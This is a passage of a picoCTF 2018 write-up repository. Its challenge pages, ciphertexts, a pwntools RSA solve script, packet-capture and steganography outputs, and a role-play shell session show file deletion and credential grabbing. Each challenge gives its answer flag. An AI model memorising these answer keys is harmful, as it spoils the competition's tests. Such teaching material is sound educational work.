    "content": "# caesar cipher 2\nPoints: 250\n\n## Category\nCryptography\n\n## Question\n>Can you help us decrypt this [message](files/)? We believe it is a form of a caesar cipher. You can find the ciphertext in /problems/caesar-cipher-2_3_4a1aa2a4d0f79a1f8e9a29319250740a on the shell server. \n\n### Hint\n>You'll have figure out the correct alphabet that was used to encrypt the ciphertext from the ascii character set\n>\n>[ASCII Table](https://www.asciitable.com/)\n\n## Solution\nTo do\n\n### Flag\n`picoCTF{cAesaR_CiPhErS_juST_aREnT_sEcUrE}`\n"
  },
  {
    "path": "Cryptography/caesar cipher 2/files/ciphertext",
    "content": "4-'3evh?'c)7%t#e-r,g6u#.9uv#%tg2v#7g'w6gA"
  },
  {
    "path": "Cryptography/hertz/README.md",
    "content": "# hertz\nPoints: 150\n\n## Category\nCryptography\n\n## Question\n>Here's another simple cipher for you where we made a bunch of substitutions. Can you decrypt it? Connect with `nc 2018shell1.picoctf.com 18581`. \n\n### Hint\n>NOTE: Flag is not in the usual flag format\n\n## Solution\nThis is a Substitution Cipher. Use an online tool to brute-force. Online tool: https://quipqiup.com/\n\n### Flag\n`substitution_ciphers_are_solvable_fgnvvgndms`\n"
  },
  {
    "path": "Cryptography/hertz/solution/ciphertext",
    "content": "-------------------------------------------------------------------------------\nuqblrjwm zxrx gm fqvr pojl - mvtmwgwvwgqb_ugyzxrm_jrx_mqokjtox_plbkklbscm\n-------------------------------------------------------------------------------\nujoo cx gmzcjxo. mqcx fxjrm jlq-bxkxr cgbs zqd oqbl yrxugmxof-zjkgbl ogwwox qr bq cqbxf gb cf yvrmx, jbs bqwzgbl yjrwguvojr wq gbwxrxmw cx qb mzqrx, g wzqvlzw g dqvos mjgo jtqvw j ogwwox jbs mxx wzx djwxrf yjrw qp wzx dqros. gw gm j djf g zjkx qp srgkgbl qpp wzx myoxxb jbs rxlvojwgbl wzx ugruvojwgqb. dzxbxkxr g pgbs cfmxop lrqdgbl lrgc jtqvw wzx cqvwz; dzxbxkxr gw gm j sjcy, srgaaof bqkxctxr gb cf mqvo; dzxbxkxr g pgbs cfmxop gbkqovbwjrgof yjvmgbl txpqrx uqppgb djrxzqvmxm, jbs trgblgbl vy wzx rxjr qp xkxrf pvbxrjo g cxxw; jbs xmyxugjoof dzxbxkxr cf zfyqm lxw mvuz jb vyyxr zjbs qp cx, wzjw gw rxhvgrxm j mwrqbl cqrjo yrgbugyox wq yrxkxbw cx prqc sxogtxrjwxof mwxyygbl gbwq wzx mwrxxw, jbs cxwzqsgujoof ebquegbl yxqyox'm zjwm qpp-wzxb, g juuqvbw gw zglz wgcx wq lxw wq mxj jm mqqb jm g ujb. wzgm gm cf mvtmwgwvwx pqr ygmwqo jbs tjoo. dgwz j yzgoqmqyzgujo poqvrgmz ujwq wzrqdm zgcmxop vyqb zgm mdqrs; g hvgxwof wjex wq wzx mzgy. wzxrx gm bqwzgbl mvryrgmgbl gb wzgm. gp wzxf tvw ebxd gw, jocqmw joo cxb gb wzxgr sxlrxx, mqcx wgcx qr qwzxr, uzxrgmz kxrf bxjrof wzx mjcx pxxogblm wqdjrsm wzx quxjb dgwz cx.\n\nwzxrx bqd gm fqvr gbmvojr ugwf qp wzx cjbzjwwqxm, txowxs rqvbs tf dzjrkxm jm gbsgjb gmoxm tf uqrjo rxxpm-uqccxrux mvrrqvbsm gw dgwz zxr mvrp. rglzw jbs oxpw, wzx mwrxxwm wjex fqv djwxrdjrs. gwm xiwrxcx sqdbwqdb gm wzx tjwwxrf, dzxrx wzjw bqtox cqox gm djmzxs tf djkxm, jbs uqqoxs tf trxxaxm, dzguz j pxd zqvrm yrxkgqvm dxrx qvw qp mglzw qp ojbs. oqqe jw wzx urqdsm qp djwxr-ljaxrm wzxrx.\n\nugruvcjctvojwx wzx ugwf qp j srxjcf mjttjwz jpwxrbqqb. lq prqc uqroxjrm zqqe wq uqxbwgxm mogy, jbs prqc wzxbux, tf dzgwxzjoo, bqrwzdjrs. 
dzjw sq fqv mxx?-yqmwxs ogex mgoxbw mxbwgbxom joo jrqvbs wzx wqdb, mwjbs wzqvmjbsm vyqb wzqvmjbsm qp cqrwjo cxb pgixs gb quxjb rxkxrgxm. mqcx oxjbgbl jljgbmw wzx mygoxm; mqcx mxjwxs vyqb wzx ygxr-zxjsm; mqcx oqqegbl qkxr wzx tvodjrem qp mzgym prqc uzgbj; mqcx zglz joqpw gb wzx rgllgbl, jm gp mwrgkgbl wq lxw j mwgoo txwwxr mxjdjrs yxxy. tvw wzxmx jrx joo ojbsmcxb; qp dxxe sjfm yxbw vy gb ojwz jbs yojmwxr-wgxs wq uqvbwxrm, bjgoxs wq txbuzxm, uogbuzxs wq sxmem. zqd wzxb gm wzgm? jrx wzx lrxxb pgxosm lqbx? dzjw sq wzxf zxrx?\n\ntvw oqqe! zxrx uqcx cqrx urqdsm, yjugbl mwrjglzw pqr wzx djwxr, jbs mxxcgblof tqvbs pqr j sgkx. mwrjblx! bqwzgbl dgoo uqbwxbw wzxc tvw wzx xiwrxcxmw ogcgw qp wzx ojbs; oqgwxrgbl vbsxr wzx mzjsf oxx qp fqbsxr djrxzqvmxm dgoo bqw mvppgux. bq. wzxf cvmw lxw nvmw jm bglz wzx djwxr jm wzxf yqmmgtof ujb dgwzqvw pjoogbl gb. jbs wzxrx wzxf mwjbs-cgoxm qp wzxc-oxjlvxm. gbojbsxrm joo, wzxf uqcx prqc ojbxm jbs jooxfm, mwrxxwm jbs jkxbvxm-bqrwz, xjmw, mqvwz, jbs dxmw. fxw zxrx wzxf joo vbgwx. wxoo cx, sqxm wzx cjlbxwgu kgrwvx qp wzx bxxsoxm qp wzx uqcyjmmxm qp joo wzqmx mzgym jwwrjuw wzxc wzgwzxr?\n"
  },
  {
    "path": "Cryptography/hertz 2/README.md",
    "content": "# hertz 2\nPoints: 200\n\n## Category\nCryptography\n\n## Question\n>This flag has been encrypted with some kind of cipher, can you decrypt it? Connect with `nc 2018shell1.picoctf.com 23479`. \n\n### Hint\n>These kinds of problems are solved with a frequency that merits some analysis.\n\n## Solution\nAnother Substitution Cipher. Use an online tool to brute-force. Online tool: https://quipqiup.com/\n\nSet _nkibILQ=picoCTF_ in _Clues_ input box.\n\n### Flag\n`picoCTF{substitution_ciphers_are_too_easy_vydbopybvn}`\n"
  },
  {
    "path": "Cryptography/hertz 2/solution/ciphertext",
    "content": "Let's decode this now!\nXcd fiejb phgor kgw qivsm gudh xcd ynza lgt. E jnr'x pdyedud xcem em mijc nr dnma shgpydv er Sejg. Ex'm nyvgmx nm ek E mgyudl n shgpydv nyhdnla! Gbna, kerd. Cdhd'm xcd kynt: sejgJXK{mipmxexixegr_jescdhm_nhd_xgg_dnma_ualpgsapur}\n"
  },
  {
    "path": "Cryptography/rsa-madlibs/README.md",
    "content": "# rsa-madlibs\nPoints: 250\n\n## Category\nCryptography\n\n## Question\n>We ran into some weird puzzles we think may mean something, can you help me solve one? Connect with `nc 2018shell1.picoctf.com 40440`\n\n### Hint\n>[RSA info](https://simple.wikipedia.org/wiki/RSA_algorithm)\n\n## Solution\nSolve each individual question to get the flag.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{d0_u_kn0w_th3_w@y_2_RS@_5d383e10}`\n"
  },
  {
    "path": "Cryptography/rsa-madlibs/solution/solve.py",
    "content": "from pwn import *\n\ns = remote('2018shell1.picoctf.com', 40440)\ns.sendline('Y\\n8815769761')\nprint s.recv()\ns.sendline('Y\\n77773')\nprint s.recv()\ns.sendline('N')\nprint s.recv()\ns.sendline('Y\\n6256003596')\nprint s.recv()\ns.sendline('Y\\n26722917505435451150596710555980625220524134812001687080485341361511207096550823814926607028717403343344600191255790864873639087129323153797404989216681535785492257030896045464472300400447688001563694767148451912130180323038978568872458130612657140514751874493071944456290959151981399532582347021031424096175747508579453024891862161356081561032045394147561900547733602483979861042957169820579569242714893461713308057915755735700329990893197650028440038700231719057433874201113850357283873424698585951160069976869223244147124759020366717935504226979456299659682165757462057188430539271285705680101066120475874786208053')\nprint s.recv()\ns.sendline('N')\nprint s.recv()\ns.sendline('Y\\n1405046269503207469140791548403639533127416416214210694972085079171787580463776820425965898174272870486015739516125786182821637006600742140682552321645503743280670839819078749092730110549881891271317396450158021688253989767145578723458252769465545504142139663476747479225923933192421405464414574786272963741656223941750084051228611576708609346787101088759062724389874160693008783334605903142528824559223515203978707969795087506678894006628296743079886244349469131831225757926844843554897638786146036869572653204735650843186722732736888918789379054050122205253165705085538743651258400390580971043144644984654914856729')\nprint s.recv()\ns.sendline('Y\\n240109877286251840533272915662757983981706320845661471802585807564915966910384301849411666983334013')\nprint s.recv()\ns.close()\n\nprint str(hex(240109877286251840533272915662757983981706320845661471802585807564915966910384301849411666983334013))[2:].decode('hex')\n"
  },
  {
    "path": "Forensics/Desrouleaux/README.md",
    "content": "# Desrouleaux\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>Our network administrator is having some trouble handling the tickets for all of of our incidents. Can you help him out by answering all the questions? Connect with `nc 2018shell1.picoctf.com 54782`. [incidents.json](files/incidents.json)\n\n### Hint\n>If you need to code, python has some good libraries for it.\n\n## Solution\nAnswer the questions manually by reading the json file provided.\n\n### Flag\n`picoCTF{J4y_s0n_d3rUUUULo_c74e3495}`\n"
  },
  {
    "path": "Forensics/Desrouleaux/files/incidents.json",
    "content": "{\n    \"tickets\": [\n        {\n            \"ticket_id\": 0,\n            \"timestamp\": \"2017/03/28 10:01:06\",\n            \"file_hash\": \"63bcd94fbe1e2c99\",\n            \"src_ip\": \"162.8.248.12\",\n            \"dst_ip\": \"187.187.82.237\"\n        },\n        {\n            \"ticket_id\": 1,\n            \"timestamp\": \"2017/09/04 15:31:42\",\n            \"file_hash\": \"63bcd94fbe1e2c99\",\n            \"src_ip\": \"162.8.248.12\",\n            \"dst_ip\": \"125.131.104.137\"\n        },\n        {\n            \"ticket_id\": 2,\n            \"timestamp\": \"2016/07/08 03:27:45\",\n            \"file_hash\": \"5d930a931dd84e8b\",\n            \"src_ip\": \"162.8.248.12\",\n            \"dst_ip\": \"82.83.105.13\"\n        },\n        {\n            \"ticket_id\": 3,\n            \"timestamp\": \"2015/06/29 08:31:31\",\n            \"file_hash\": \"e3b90623a0ca9745\",\n            \"src_ip\": \"223.209.63.210\",\n            \"dst_ip\": \"187.187.82.237\"\n        },\n        {\n            \"ticket_id\": 4,\n            \"timestamp\": \"2015/02/13 04:31:55\",\n            \"file_hash\": \"720096b2b2855d17\",\n            \"src_ip\": \"223.209.63.210\",\n            \"dst_ip\": \"125.131.104.137\"\n        },\n        {\n            \"ticket_id\": 5,\n            \"timestamp\": \"2017/11/09 01:26:22\",\n            \"file_hash\": \"e3b90623a0ca9745\",\n            \"src_ip\": \"162.8.248.12\",\n            \"dst_ip\": \"149.0.138.115\"\n        },\n        {\n            \"ticket_id\": 6,\n            \"timestamp\": \"2017/01/20 15:02:47\",\n            \"file_hash\": \"ac84dfa24377cb40\",\n            \"src_ip\": \"124.80.164.10\",\n            \"dst_ip\": \"149.235.167.177\"\n        },\n        {\n            \"ticket_id\": 7,\n            \"timestamp\": \"2015/02/15 15:26:18\",\n            \"file_hash\": \"347989286aebfcf2\",\n            \"src_ip\": \"124.80.164.10\",\n            \"dst_ip\": \"0.183.177.9\"\n        },\n      
  {\n            \"ticket_id\": 8,\n            \"timestamp\": \"2015/08/11 07:48:40\",\n            \"file_hash\": \"e6cfc9c79e33de45\",\n            \"src_ip\": \"162.8.248.12\",\n            \"dst_ip\": \"237.219.198.133\"\n        },\n        {\n            \"ticket_id\": 9,\n            \"timestamp\": \"2016/05/18 05:22:45\",\n            \"file_hash\": \"5d930a931dd84e8b\",\n            \"src_ip\": \"55.36.143.123\",\n            \"dst_ip\": \"149.0.138.115\"\n        }\n    ]\n}"
  },
  {
    "path": "Forensics/Ext Super Magic/README.md",
    "content": "# Ext Super Magic\nPoints: 250\n\n## Category\nForensics\n\n## Question\n>We salvaged a ruined Ext SuperMagic II-class mech recently and pulled the [filesystem](files/ext-super-magic.img) out of the black box. It looks a bit corrupted, but maybe there's something interesting in there. You can also find it in /problems/ext-super-magic_4_f196e59a80c3fdac37cc2f331692ef13 on the shell server. \n\n### Hint\n>Are there any [tools](https://en.wikipedia.org/wiki/Fsck) for diagnosing corrupted filesystems? What do they say if you run them on this one?\n>\n>How does a linux machine know what [type](https://www.garykessler.net/library/file_sigs.html) of file a [file](https://linux.die.net/man/1/file) is?\n>\n>You might find this [doc](http://www.nongnu.org/ext2-doc/ext2.html) helpful.\n>\n>Be careful with [endianness](https://en.wikipedia.org/wiki/Endianness) when making edits.\n>\n>Once you've fixed the corruption, you can use /sbin/[debugfs](https://linux.die.net/man/8/debugfs) to pull the flag file out.\n\n## Solution\nTo do.\n\n### Flag\n`picoCTF{a7DB29eCf7dB9960f0A19Fdde9d00Af0}`\n"
  },
  {
    "path": "Forensics/Forensics Warmup 1/README.md",
    "content": "# Forensics Warmup 1\nPoints: 50\n\n## Category\nForensics\n\n## Question\n>Can you unzip this [file](files/flag.zip) for me and retreive the flag?\n\n### Hint\n>Make sure to submit the flag as picoCTF{XXXXX}\n\n## Solution\nExtract the zipped file provided by doing `unzip flag.zip`.\n\nThe extracted file contain _flag.jpg_. Open image in an image viewer to get the flag.\n\n### Flag\n`picoCTF{welcome_to_forensics}`\n"
  },
  {
    "path": "Forensics/Forensics Warmup 2/README.md",
    "content": "# Forensics Warmup 2\nPoints: 50\n\n## Category\nForensics\n\n## Question\n>Hmm for some reason I can't open this [PNG](files/flag.png)? Any ideas?\n\n### Hint\n>How do operating systems know what kind of file it is? (It's not just the ending!\n>\n>Make sure to submit the flag as picoCTF{XXXXX}\n\n## Solution\nDo `file flag.png` to find the actual filetype.\n\nHowever, most image viewer software should be able to open the _.png_ file without any problem.\n\nIf this doesn't work change the file extension to _.jpg_\n\n### Flag\n`picoCTF{extensions_are_a_lie}`\n"
  },
  {
    "path": "Forensics/LoadSomeBits/README.md",
    "content": "# LoadSomeBits\nPoints: 550\n\n## Category\nForensics\n\n## Question\n>Can you find the flag encoded inside this [image](files/)? You can also find the file in /problems/loadsomebits_4_7be73021cd0c9c84b08937323b0d6ae1 on the shell server. \n\n### Hint\n>Look through the Least Significant Bits for the image\n>\n>If you interpret a binary sequence (seq) as ascii and then try interpreting the same binary sequence from an offset of 1 (seq[1:]) as ascii do you get something similar or completely different?\n\n## Solution\nTo do.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Forensics/Lying Out/README.md",
    "content": "# Lying Out\nPoints: 250\n\n## Category\nForensics\n\n## Question\n>Some odd [traffic](files/traffic.png) has been detected on the network, can you identify it? More info here. Connect with `nc 2018shell1.picoctf.com 50875` to help us answer some questions. \n\n### Hint\nNo Hints.\n\n## Solution\nTo do.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Forensics/Malware Shops/README.md",
    "content": "# Malware Shops\nPoints: 400\n\n## Category\nForensics\n\n## Question\n>There has been some [malware](files/plot.png) detected, can you help with the analysis? More [info](files/info.txt) here. Connect with `nc 2018shell1.picoctf.com 18874`. \n\n### Hint\nNo Hints.\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Forensics/Malware Shops/files/info.txt",
    "content": "You've been given a dataset of about 500 malware binary files that have\nbeen found on your organization's computers. Whenever you find more malware,\nyou want to be able to tell if you've seen a file like this before.\n\nBinary files are hard to understand. When code is written, there are several\nmore steps before it becomes software. Some parts of this process are:\ni.  Compiling, which turns human-readable source code into assembly code.\n    Assembly code is difficult for humans to read, but it closely mimics the most\n    basic raw instructions that a computer needs in order to run a program.\nii. Assembling, which turns assembly code into machine code. Machine code is\n    impossible for humans to read, but this representation is what a computer\n    actually needs to execute.\n\nThe malware binary files that were given to you to analyze are all in machine\ncode, but luckily, you were able to run a program called a disassembler to\nturn them back into assembly code.\n\nAssembly code contains *instructions* which tell a computer how to update\nits own internal memory, and its progress through reading the assembly code\nitself. For instance, the `jmp` instruction means \"jump to executing a\ndifferent instruction\", and the `add` instruction means \"add two numbers and\nstore the result in memory\".\n\nYour dataset contains data about all the malware files, including their\nfile hash, which serves as a name, and the counts of all of the `jmp` and `add`\ninstructions.\n\nMalware attackers often release many slightly different versions of the same\nmalware over time. These different versions always have totally different\nhashes, but they are likely to have similar numbers of `jmp` and `add`\ninstructions.\n"
  },
  {
    "path": "Forensics/Reading Between the Eyes/README.md",
    "content": "# Reading Between the Eyes\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>Stego-Saurus hid a message for you in this image, can you retreive it?\n\n### Hint\n>Maybe you can find an online decoder?\n\n## Solution\ninstall zsteg \n```gem install zsteg```\nrun `zsteg husky.png`\n```\nb1,r,lsb,xy         .. text: \"^5>c[rvyzrf@\"\nb1,rgb,lsb,xy       .. text: \"picoCTF{r34d1ng_b37w33n_7h3_by73s}\"\nb1,abgr,msb,xy      .. file: PGP\\011Secret Sub-key -\nb2,g,msb,xy         .. text: \"ADTU@PEPA\"\nb2,rgb,lsb,xy       .. file: PGP\\011Secret Sub-key -\nb3,abgr,msb,xy      .. text: \"t@Wv!Wt\\tGtA\"\nb4,r,msb,xy         .. text: \"0Tt7F3Saf\"\nb4,g,msb,xy         .. text: \"2g'uV `3\"\nb4,b,lsb,xy         .. text: \"##3\\\"TC%\\\"2f\"\nb4,b,msb,xy         .. text: \" uvb&b@f!\"\nb4,rgb,lsb,xy       .. text: \"1C5\\\"RdWD\"\nb4,rgb,msb,xy       .. text: \"T E2d##B#VuQ`\"\nb4,bgr,lsb,xy       .. text: \"A%2RTdGG\"\nb4,bgr,msb,xy       .. text: \"EPD%4\\\"c\\\"#CUVqa \"\nb4,rgba,lsb,xy      .. text: \"?5/%/d_tO\"\nb4,abgr,msb,xy      .. text: \"EO%O#/c/2/C_e_q\"\n```\n\n### Flag\n`picoCTF{r34d1ng_b37w33n_7h3_by73s}`\n"
  },
  {
    "path": "Forensics/Recovering From the Snap/README.md",
    "content": "# Recovering From the Snap\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>There used to be a bunch of [animals](files/animals.dd) here, what did Dr. Xernon do to them? \n\n### Hint\n>Some files have been deleted from the disk image, but are they really gone?.\n\n## Solution\ninstall photoRec [as per your OS and architecture]\n```https://www.cgsecurity.org/wiki/TestDisk_Download```\n\nrun ```photoRec animals.dd```\n\n<br>\nIt will recover 4 .JPG files\n<br>\n3 of them are animal photos and 4th one contains the flag.\n<br>\n\n### Flag\n`picoCTF{th3_5n4p_happ3n3d}`"
  },
  {
    "path": "Forensics/Truly an Artist/README.md",
    "content": "# Truly an Artist\nPoints: 200\n\n## Category\nForensics\n\n## Question\n>Can you help us find the flag in this [Meta-Material](files/2018.png)? You can also find the file in /problems/truly-an-artist_3_066d6319e350c1d579e5cf32e326ba02. \n\n### Hint\n>Try looking beyond the image.\n>\n>Who created this?\n\n## Solution\nTo do.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Forensics/What's My Name?/README.md",
    "content": "# What's My Name?\nPoints: 250\n\n## Category\nForensics\n\n## Question\n>Say my name, say [my name](files/myname.pcap). \n\n### Hint\n>If you visited a website at an IP address, how does it know the name of the domain?\n\n## Solution\nTo Do.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Forensics/admin panel/README.md",
    "content": "# admin panel\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>We captured some [traffic](files/admin_panel.pcap) logging into the admin panel, can you find the password?\n\n### Hint\n>Tools like wireshark are pretty good for analyzing pcap files.\n\n## Solution\nopen data.pcap in wireshark and look through the data by following the packets, on `tcp.stream 5` the plaintext password and username will be shown\n```\nPOST /login HTTP/1.1\nHost: 192.168.3.128\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.3.128/\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 53\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\n\nuser=admin&password=picoCTF{n0ts3cur3_13597b43}\n```\n\n### Flag\n`picoCTF{n0ts3cur3_13597b43}`\n"
  },
  {
    "path": "Forensics/core/README.md",
    "content": "# core\nPoints: 350\n\n## Category\nForensics\n\n## Question\n>This [program](files/print) was about to print the flag when it died. Maybe the flag is still in this [core](files/core) file that it dumped? Also available at /problems/core_3_bbdfe8f633bce938028c1339013a4865 on the shell server. \n\n### Hint\n>What is a core file?\n>\n>You may find this [reference](http://darkdust.net/files/GDB%20Cheat%20Sheet.pdf) helpful.\n>\n>Try to figure out where the flag was read into memory using the disassembly and [strace](https://linux.die.net/man/1/strace).\n>\n>You should study the format options on the cheat sheet and use the examine (x) or print (p) commands. disas may also be useful.\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Forensics/hex editor/README.md",
    "content": "# hex editor\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>This [cat](files/hex_editor.jpg) has a secret to teach you. You can also find the file in /problems/hex-editor_2_c1a99aee8d919f6e42697662d798f0ff on the shell server. \n\n### Hint\n>What is a hex editor?\n>\n>Maybe google knows.\n>\n>[xxd](http://linuxcommand.org/man_pages/xxd1.html)\n>\n>[hexedit](http://linuxcommand.org/man_pages/hexedit1.html)\n>\n>[bvi](http://manpages.ubuntu.com/manpages/natty/man1/bvi.1.html)\n\n## Solution\nTo do.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Forensics/now you don't/README.md",
    "content": "# now you don't\nPoints: 200\n\n## Category\nForensics\n\n## Question\n>We heard that there is something hidden in this [picture](files/nowYouDont.png). Can you find it? \n\n### Hint\n>There is an old saying: if you want to hide the treasure, put it in plain sight. Then no one will see it.\n>\n>Is it really all one shade of red?\n\n## Solution\nDownload the image, put it into MS paint or image editor of your choice. Then, fill in the background with any non-red colour, to reveal the answer\n\n### Flag\npicoCTF{n0w_y0u_533_m3}\n"
  },
  {
    "path": "General Skills/Aca-Shell-A/README.md",
    "content": "# Aca-Shell-A\nPoints: 150\n\n## Category\nGeneral Skills\n\n## Question\n>It's never a bad idea to brush up on those linux skills or even learn some new ones before you set off on this adventure! Connect with `nc 2018shell1.picoctf.com 33158`.\n\n### Hint\n>Linux for [Beginners](https://maker.pro/education/basic-linux-commands-for-beginners)\n\n## Solution\nThis challenge teaches you the basic commands of Linux.\n\n- `ls`\n- `cd`\n- `rm`\n- How to execute files\n- `whoami`\n- `cat`\n\nFollow the instructions and get the flag.\n\n```\n$ nc 2018shell1.picoctf.com 33158\nSweet! We have gotten access into the system but we aren't root.\nIt's some sort of restricted shell! I can't see what you are typing\nbut I can see your output. I'll be here to help you along.\nIf you need help, type \"echo 'Help Me!'\" and I'll see what I can do\nThere is not much time left!\n~/$ ls\nblackmail\nexecutables\npasswords\nphotos\nsecret\n~/$ cd secret\nNow we are cookin'! Take a look around there and tell me what you find!\n~/secret$ ls\nintel_1\nintel_2\nintel_3\nintel_4\nintel_5\nprofile_AipieG5Ua9aewei5ieSoh7aph\nprofile_Xei2uu5suwangohceedaifohs\nprofile_ahShaighaxahMooshuP1johgo\nprofile_ahqueith5aekongieP4ahzugi\nprofile_aik4hah9ilie9foru0Phoaph0\nprofile_bah9Ech9oa4xaicohphahfaiG\nprofile_ie7sheiP7su2At2ahw6iRikoe\nprofile_of0Nee4laith8odaeLachoonu\nprofile_poh9eij4Choophaweiwev6eev\nprofile_poo3ipohGohThi9Cohverai7e\nSabatoge them! Get rid of all their intel files!\n~/secret$ rm intel*\nNice! Once they are all gone, I think I can drop you a file of an exploit!\nJust type \"echo 'Drop it in!' 
\" and we can give it a whirl!\n~/secret$ echo 'Drop it in!'\nDrop it in!\nI placed a file in the executables folder as it looks like the only place we can execute from!\nRun the script I wrote to have a little more impact on the system!\n~/secret$ cd ..\n~/$ cd executables\n~/executables$ ls  \ndontLookHere\n~/executables$ ./dontLookHere\n...\n...\n...\nLooking through the text above, I think I have found the password. I am just having trouble with a username.\nOh drats! They are onto us! We could get kicked out soon!\nQuick! Print the username to the screen so we can close are backdoor and log into the account directly!\nYou have to find another way other than echo!\n~/executables$ whoami\nl33th4x0r\nPerfect! One second!\nOkay, I think I have got what we are looking for. I just need to to copy the file to a place we can read.\nTry copying the file called TopSecret in tmp directory into the passwords folder.\n~/executables$ cp /tmp/TopSecret passwords\nServer shutdown in 10 seconds...\nQuick! go read the file before we lose our connection!\n~/executables$ cd ..\n~/$ ls\nblackmail\nexecutables\npasswords\nphotos\nsecret\n~/$ cd passwords\n~/passwords$ ls\nTopSecret\n~/passwords$ cat TopSecret\nMajor General John M. 
Schofield's graduation address to the graduating class of 1879 at West Point is as follows: The discipline which makes the soldiers of a free country reliable in battle is not to be gained by harsh or tyrannical treatment.On the contrary, such treatment is far more likely to destroy than to make an army.It is possible to impart instruction and give commands in such a manner and such a tone of voice as to inspire in the soldier no feeling butan intense desire to obey, while the opposite manner and tone of voice cannot fail to excite strong resentment and a desire to disobey.The one mode or other of dealing with subordinates springs from a corresponding spirit in the breast of the commander.He who feels the respect which is due to others, cannot fail to inspire in them respect for himself, while he who feels,and hence manifests disrespect towards others, especially his subordinates, cannot fail to inspire hatred against himself.\npicoCTF{CrUsHeD_It_9edaa84a}\n```\n\n### Flag\n`picoCTF{CrUsHeD_It_9edaa84a}`\n"
  },
  {
    "path": "General Skills/Dog or Frog/README.md",
    "content": "# Dog or Frog\nPoints: 400\n\n## Category\nGeneral Skills\n\n## Question\n>Dressing up dogs are kinda the new thing, see if you can get this lovely girl ready for her costume party. [Dog Or Frog](http://2018shell1.picoctf.com:5467/)\n\n### Hint\n>This really is a ML problem, read the hints in the problem for more details..\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "General Skills/General Warmup 1/README.md",
    "content": "# General Warmup 1\nPoints: 50 \n\n## Category\nGeneral Skills\n\n## Question\n>If I told you your grade was 0x41 in hexadecimal, what would it be in ASCII?\n\n### Hint\n>Submit your answer in our competition's flag format. For example, if you answer was 'hello', you would submit 'picoCTF{hello}' as the flag.\n\n## Solution\nWe can use Python to get the ASCII value of _0x41_.\n\n```python\n>>> chr(0x41)\n'A'\n```\n\n### Flag\n`picoCTF{A}`\n"
  },
  {
    "path": "General Skills/General Warmup 2/README.md",
    "content": "# General Warmup 2\nPoints: 50\n\n## Category\nGeneral Skills\n\n## Question\n>Can you convert the number 27 (base 10) to binary (base 2)? \n\n### Hint\n>Submit your answer in our competition's flag format. For example, if you answer was '11111', you would submit 'picoCTF{11111}' as the flag.\n\n## Solution\nWe can use Python to convert an integer to a binary number.\n\n```python\n>>> bin(27)[2:]\n'11011'\n```\n\n### Flag\n`picoCTF{11011}`\n"
  },
  {
    "path": "General Skills/General Warmup 3/README.md",
    "content": "# General Warmup 3\nPoints: 50\n\n## Category\nGeneral Skills\n\n## Question\n>What is 0x3D (base 16) in decimal (base 10). \n\n### Hint\n>Submit your answer in our competition's flag format. For example, if you answer was '22', you would submit 'picoCTF{22}' as the flag.\n\n## Solution\nWe can use Python to convert hexadecimal to decimal numbers.\n\n```python\n>>> 0x3d\n61\n```\n\n### Flag\n`picoCTF{61}`\n"
  },
  {
    "path": "General Skills/Resources/README.md",
    "content": "# Resources\nPoints: 50\n\n## Category\nGeneral Skills\n\n## Question\n>We put together a bunch of resources to help you out on our website! If you go over there, you might even find a flag! https://picoctf.com/resources ([link](https://picoctf.com/resources)) \n\n### Hint\nNo hints available\n\n## Solution\nGo to the link, scroll down and you can find the flag.\n\n### Flag\n`picoCTF{xiexie_ni_lai_zheli}`\n"
  },
  {
    "path": "General Skills/Resources/solution/source/resources",
    "content": "<!DOCTYPE HTML>\n<html lang=\"en\">\n\n<head>\n    <meta charset=\"utf-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, user-scalable=no\">\n    <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n    <meta name=\"description\" content=\"picoCTF is a free computer security game for middle and high school students.\">\n    <meta name=\"designer\" content=\"Jason Petz - https://petzdes.com\">\n    <meta property=\"og:title\" content=\"picoCTF - CMU Cybersecurity Competition - Resources\">\n    <meta property=\"og:description\" content=\"picoCTF is a free computer security game for middle and high school students.\">\n    <meta property=\"og:type\" content=\"website\">\n    <meta property=\"og:url\" content=\"/resources.html\">\n    <meta property=\"og:image\" content=\"https://picoctf.com/img/picoctf_og.png\">\n    <title>picoCTF - CMU Cybersecurity Competition - Resources</title>\n    <link href=\"https://fonts.googleapis.com/css?family=Roboto:300,400,700,900\" rel=\"stylesheet\">\n    <link rel=\"stylesheet\" href=\"/css/main.css\">\n    <link rel=\"stylesheet\" href=\"/css/font-awesome.min.css\">\n    <link rel=\"apple-touch-icon\" sizes=\"57x57\" href=\"/apple-icon-57x57.png\">\n    <link rel=\"apple-touch-icon\" sizes=\"60x60\" href=\"/apple-icon-60x60.png\">\n    <link rel=\"apple-touch-icon\" sizes=\"72x72\" href=\"/apple-icon-72x72.png\">\n    <link rel=\"apple-touch-icon\" sizes=\"76x76\" href=\"/apple-icon-76x76.png\">\n    <link rel=\"apple-touch-icon\" sizes=\"114x114\" href=\"/apple-icon-114x114.png\">\n    <link rel=\"apple-touch-icon\" sizes=\"120x120\" href=\"/apple-icon-120x120.png\">\n    <link rel=\"apple-touch-icon\" sizes=\"144x144\" href=\"/apple-icon-144x144.png\">\n    <link rel=\"apple-touch-icon\" sizes=\"152x152\" href=\"/apple-icon-152x152.png\">\n    <link rel=\"apple-touch-icon\" sizes=\"180x180\" href=\"/apple-icon-180x180.png\">\n    <link rel=\"icon\" type=\"image/png\" 
